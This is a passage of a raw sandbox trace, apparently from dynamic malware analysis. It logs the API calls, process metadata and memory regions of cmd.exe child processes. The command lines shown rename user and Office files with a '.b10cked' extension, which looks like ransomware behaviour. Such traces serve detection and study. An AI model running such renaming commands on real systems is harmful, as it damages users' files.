lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x9, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x9, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegCloseKey (hKey=0x40) returned 0x0 [0199.712] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a1 [0199.712] srand (_Seed=0x5b8863a1) [0199.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"" [0199.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"" [0199.713] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.713] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0199.713] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0199.713] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0199.713] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0199.713] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0199.713] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0199.713] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0199.713] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0199.713] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0199.713] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0199.713] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0199.713] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0199.713] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0199.713] GetEnvironmentStringsW () returned 0x3d22d0* [0199.714] FreeEnvironmentStringsW (penv=0x3d22d0) returned 1 [0199.714] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.714] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0199.714] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0199.714] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0199.714] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0199.714] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0199.714] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0199.714] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0199.714] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0199.714] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0199.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fc00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.714] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fc00, lpFilePart=0x20fbfc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fbfc*="Desktop") returned 0x18 [0199.714] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0199.714] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f97c | out: lpFindFileData=0x20f97c) returned 0x3d0010 [0199.714] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0199.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f97c | out: lpFindFileData=0x20f97c) returned 0x3d0010 [0199.714] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0199.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f97c | out: lpFindFileData=0x20f97c) returned 0x3d0010 [0199.715] FindClose (in: hFindFile=0x3d0010 | out: hFindFile=0x3d0010) returned 1 [0199.715] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0199.715] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0199.715] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0199.715] GetEnvironmentStringsW () returned 0x3d2af0* [0199.715] FreeEnvironmentStringsW (penv=0x3d2af0) returned 1 [0199.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.715] GetConsoleOutputCP () returned 0x1b5 [0199.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0199.715] GetUserDefaultLCID () returned 0x409 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fd40, cchData=128 | out: lpLCData="0") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fd40, cchData=128 | out: lpLCData="0") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fd40, cchData=128 | out: lpLCData="1") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0199.716] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0199.716] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0199.717] GetConsoleTitleW (in: lpConsoleTitle=0x3c08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0199.717] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0199.717] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0199.717] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0199.718] _wcsicmp (_String1="move", _String2=")") returned 68 [0199.718] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0199.718] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0199.718] _wcsicmp (_String1="IF", _String2="move") returned -4 [0199.718] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0199.718] _wcsicmp (_String1="REM", _String2="move") returned 5 [0199.718] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0199.721] GetConsoleTitleW (in: lpConsoleTitle=0x20fa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.722] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0199.722] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0199.722] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0199.722] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="CD") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="REN") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="SET") returned -6 [0199.722] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0199.722] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0199.722] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0199.722] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0199.722] _wcsicmp (_String1="move", _String2="MD") returned 11 [0199.722] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0199.722] _wcsicmp (_String1="move", _String2="RD") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0199.722] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0199.722] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0199.722] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0199.722] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0199.722] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0199.722] _wcsicmp (_String1="move", _String2="VER") returned -9 [0199.722] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0199.722] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0199.722] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0199.722] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0199.722] _wcsicmp (_String1="move", _String2="START") returned -6 [0199.723] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0199.723] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0199.723] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0199.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.724] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.725] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f7f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f7ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f7ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0199.725] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0199.726] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0199.726] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0199.726] _wcsicmp (_String1="MSGROO~1.HXN", _String2=".") returned 63 [0199.726] _wcsicmp (_String1="MSGROO~1.HXN", _String2="..") returned 63 [0199.726] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgroo~1.hxn")) returned 0x2022 [0199.727] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0199.727] SetErrorMode (uMode=0x0) returned 0x0 [0199.727] SetErrorMode (uMode=0x1) returned 0x0 [0199.727] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", nBufferLength=0x104, lpBuffer=0x20f17c, lpFilePart=0x20f164 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", lpFilePart=0x20f164*="MSGROO~1.HXN") returned 0x27 [0199.727] SetErrorMode (uMode=0x0) returned 0x1 [0199.727] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0199.727] _wcsicmp (_String1="MSGROO~1.HXN", _String2=".") returned 63 [0199.727] _wcsicmp (_String1="MSGROO~1.HXN", _String2="..") returned 63 [0199.727] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgroo~1.hxn")) returned 0x2022 [0199.727] SetErrorMode (uMode=0x0) returned 0x0 [0199.727] SetErrorMode (uMode=0x1) returned 0x0 [0199.727] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", nBufferLength=0x104, lpBuffer=0x20f5f8, lpFilePart=0x20f390 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", lpFilePart=0x20f390*="MSGROO~1.HXN") returned 0x27 [0199.727] SetErrorMode (uMode=0x0) returned 0x1 [0199.727] SetErrorMode (uMode=0x0) returned 0x0 [0199.727] SetErrorMode (uMode=0x1) returned 0x0 [0199.727] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x20f800, lpFilePart=0x20f390 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked", lpFilePart=0x20f390*="MS.GROOVE.14.1033.hxn.b10cked") returned 0x38 [0199.727] SetErrorMode (uMode=0x0) returned 0x1 [0199.728] SetLastError (dwErrCode=0x0) [0199.728] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.groove.14.1033.hxn.b10cked")) returned 0xffffffff [0199.728] GetLastError () returned 0x2 [0199.728] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x20ed0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ed0c) returned 0x3c0e70 [0199.728] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x20ed0c | out: lpFindFileData=0x20ed0c) returned 0 [0199.729] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.729] GetLastError () returned 0x12 [0199.729] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x20ed0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ed0c) returned 0x3c0e70 [0199.729] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x20ed0c | out: lpFindFileData=0x20ed0c) returned 0 [0199.729] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.729] GetLastError () returned 0x12 [0199.730] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3d1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1be0) returned 0x3c0e70 [0199.730] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x3d1be0 | out: lpFindFileData=0x3d1be0) returned 0 [0199.730] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.730] GetLastError () returned 0x12 [0199.730] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3d1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1be0) returned 0x3c0e70 [0199.731] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x3d1be0 | out: lpFindFileData=0x3d1be0) returned 0 [0199.731] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0199.731] GetLastError () returned 0x12 [0199.731] _get_osfhandle (_FileHandle=2) returned 0xb [0199.731] GetFileType (hFile=0xb) returned 0x2 [0199.762] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0199.762] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20eedc | out: lpMode=0x20eedc) returned 1 [0199.763] _get_osfhandle (_FileHandle=2) returned 0xb [0199.763] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x20ef10 | out: lpConsoleScreenBufferInfo=0x20ef10) returned 1 [0199.763] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0199.764] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ef50 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0199.764] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x20ef34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ef34*=0x2c) returned 1 [0199.765] longjmp () [0199.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.765] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0199.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.765] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0199.765] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.765] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0199.765] SetConsoleInputExeNameW () returned 0x1 [0199.765] GetConsoleOutputCP () returned 0x1b5 [0199.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0199.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.766] exit (_Code=1) Process: id = "462" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29206 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29207 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29208 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29209 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 29210 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29211 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29212 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29213 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29214 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29215 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30093 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30094 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30095 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 30096 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30097 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 30098 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30099 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30100 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30101 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30102 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30103 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30104 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30105 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30106 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30107 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 30108 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 